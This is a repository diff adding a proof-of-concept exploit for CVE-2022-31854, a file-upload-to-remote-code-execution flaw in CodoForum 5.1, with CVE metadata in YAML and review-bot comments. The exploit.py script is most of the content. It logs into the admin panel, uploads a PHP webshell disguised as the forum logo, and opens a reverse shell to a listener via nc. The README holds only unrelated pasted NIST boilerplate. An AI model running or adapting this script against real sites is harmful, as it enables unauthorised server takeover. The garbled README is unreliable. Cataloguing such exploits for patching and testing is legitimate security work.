diff --git a/cve/codoforum/2022/CVE-2022-31854/README.md b/cve/codoforum/2022/CVE-2022-31854/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..4457882d905060a3ee50ae74e5e22ca49e68905e
--- /dev/null
+++ b/cve/codoforum/2022/CVE-2022-31854/README.md
@@ -0,0 +1,6 @@
+# CVE-2022-31854 Proof-of-Concept
+
+### Overview
+
+References to Advisories, Solutions, and Tools
+By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.
\ No newline at end of file
diff --git a/cve/codoforum/2022/CVE-2022-31854/exploit.py b/cve/codoforum/2022/CVE-2022-31854/exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..d31cb3a22e2fe45d2023c8072d470e52b3b79965
--- /dev/null
+++ b/cve/codoforum/2022/CVE-2022-31854/exploit.py
@@ -0,0 +1,89 @@ +# Exploit Title: CodoForum v5.1 - File Upload Bypass to RCE (Authenticated) +# Date: 06/07/2022 +# Exploit Author: Krish Pandey (@vikaran101) +# Vendor Homepage: https://codoforum.com/ +# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip +# Version: CodoForum v5.1 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2022-31854 + +#!/usr/bin/python3 + +import requests +import time +import optparse +import random +import string + +banner = """ + ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ + / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | +| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ +| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _| + \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| +""" + +print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)") +print(banner) +print("\nExploit found and written by: @vikaran101\n") + +parser = optparse.OptionParser() +parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install') +parser.add_option('-u', '--username', action="store", dest='username', help='admin username') +parser.add_option('-p', '--password', action="store", dest='password', help='admin password') +parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address') +parser.add_option('-n', '--port', action="store", dest='port', help='listener port number') + +options, args = parser.parse_args() + +proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + +if not options.target or not options.username or not options.password or not options.ip or not options.port: + print("[-] Missing arguments!") + print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]") + print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help") + exit() + +loginURL = 
options.target + '/admin/?page=login' +globalSettings = options.target + '/admin/index.php?page=config' +payloadURL = options.target + '/sites/default/assets/img/attachments/' + +session = requests.Session() + +randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10))) + +def getPHPSESSID(): + + try: + get_PHPID = session.get(loginURL) + headerDict = get_PHPID.headers + cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1] + return cookies + except: + exit() + +phpID = getPHPSESSID() + +def login(): + send_cookies = {'cf':'0'} + send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'} + send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--" + auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy) + + if "CODOFORUM | Dashboard" in auth.text: + print("[+] Login successful") + +def uploadAndExploit(): + send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID} + send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'} + send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; 
name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; 
name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n' + exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy) + + print("[*] Checking webshell status and executing...") + payloadExec = session.get(payloadURL + 
randomFileName + '.php', proxies=proxy) + if payloadExec.status_code == 200: + print("[+] Payload uploaded successfully and executed, check listener") + else: + print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])") +login() +uploadAndExploit() diff --git a/cve/codoforum/2022/CVE-2022-31854/requirements.txt b/cve/codoforum/2022/CVE-2022-31854/requirements.txt new file mode 100644 index 0000000000000000000000000000000000000000..f2e8afac28ebfb683afe9d90214bc4e26c4b5132 --- /dev/null +++ b/cve/codoforum/2022/CVE-2022-31854/requirements.txt @@ -0,0 +1,2 @@ +requests +optparse diff --git a/cve/codoforum/2022/yaml/CVE-2022-31854.yaml b/cve/codoforum/2022/yaml/CVE-2022-31854.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7e1a642355d8c19708004bf1f1da0021c564f50d --- /dev/null +++ b/cve/codoforum/2022/yaml/CVE-2022-31854.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-31854 +source: https://github.com/Vikaran101/CVE-2022-31854 +info: + name: Codoforum – 一个免费增值的跨平台论坛应用程序,需要基于 PHP 的 Web 服务器才能工作。 + severity: high + description: | + 通过管理面板中的徽标更改选项发现Codoforum v5.1包含任意文件上传漏洞。 + scope-of-influence: + Codoforum = 5.1 + reference: + - https://codoforum.com + - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc + - https://github.com/Vikaran101/CVE-2022-31854/blob/main/exploit.py + - http://packetstormsecurity.com/files/167782/CodoForum-5.1-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-31854 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: RCE, cve2022, 危险类型文件的不加限制上传 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5d5c89dd537898f0aad7d83cb346d87d988788d3..df48a30d35c9bc7c0d38ed70f068ca7e91cf05ae 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml 
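Review bot: `getPHPSESSID` wraps the whole request in a bare `except:` that calls `exit()` with no message, so a refused connection, a proxy error or a response without a `Set-Cookie` header all end the run silently with exit status 0 and nothing for the user to act on. Catching the specific failures and reporting them is enough: `except (requests.RequestException, KeyError) as err:` followed by `sys.exit(f"[-] Could not obtain a session cookie: {err}")`, with `import sys` added to the import block. Two smaller style points in the same hunk: the `#!/usr/bin/python3` line sits after the header comments, so it is not a shebang and the `./exploit.py` form shown in the usage text will not run unless the interpreter is invoked explicitly; `import time` and the `args` returned by `parse_args()` are unused, and `optparse` has been deprecated in favour of `argparse` since Python 3.2.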
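Review bot: `optparse` is a standard-library module, not a PyPI distribution, so `pip install -r requirements.txt` will fail on that line unless an unrelated package of the same name happens to exist on the index; only `requests` belongs in this file. Since this is what anyone reproducing the PoC installs from, pin the one real dependency to the version the script was tested with rather than leaving it unbounded, e.g. `requests==<tested version>`.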
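Review bot: `cnvd-id: None` and `kve-id: None` are parsed by YAML as the string `"None"`, not as a null value; if the consumer of these records treats a missing identifier as null, these should be `~` or left empty (`cnvd-id:`), and if it expects the literal string the schema should say so — I cannot tell which from the page. The `scope-of-influence` entry `Codoforum = 5.1` is a free-text line under a key, which reads fine but is not machine-comparable; if other records in the repository use a structured form, this one should match it.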
@@ -87,6 +87,8 @@ cve:
 - CVE-2022-2992
 - CVE-2022-2185
 - CVE-2022-2884
+ codoforum:
+ - CVE-2022-31854
 confluence:
 - CVE-2019-3394
 - CVE-2019-3396